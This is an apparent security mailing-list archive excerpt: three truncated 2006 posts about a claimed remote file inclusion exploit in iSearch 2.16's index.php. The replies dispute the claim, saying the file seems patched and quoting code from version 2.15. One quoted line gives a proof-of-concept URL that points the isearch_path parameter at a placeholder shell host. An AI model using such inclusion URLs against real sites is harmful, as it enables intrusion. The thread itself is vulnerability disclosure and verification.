Re: The latest version of iSearch is V2.16 <= (index.php) Remote File Inclusion Exploit

2006-10-11 Thread Steven M. Christey
str0ke said: >index.php seems patched to me. The following code was in 2.15, which also suggests that the issue might not exist, at least for index.php: $isearch_path = '.'; define('IN_ISEARCH', true); require_once "$isearch_path/inc/core.inc.php"; require_once "$isearch_path/inc/searc

Re: The latest version of iSearch is V2.16 <= (index.php) Remote File Inclusion Exploit

2006-10-10 Thread str0ke
On 7 Oct 2006 22:14:00 -, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote: #The latest version of iSearch is V2.16 <= (index.php) Remote File Inclusion Exploit #Vlu Code : # #htpp://sitename.com/[scerpitPath]/index.php?isearch_path=http://SHELLURL.COM $isearch_path = dirname

The latest version of iSearch is V2.16 <= (index.php) Remote File Inclusion Exploit

2006-10-09 Thread xp1o
#=== === #The latest version of iSearch is V2.16 <= (index.php) Remote File Inclusion Exploit #=== #Bug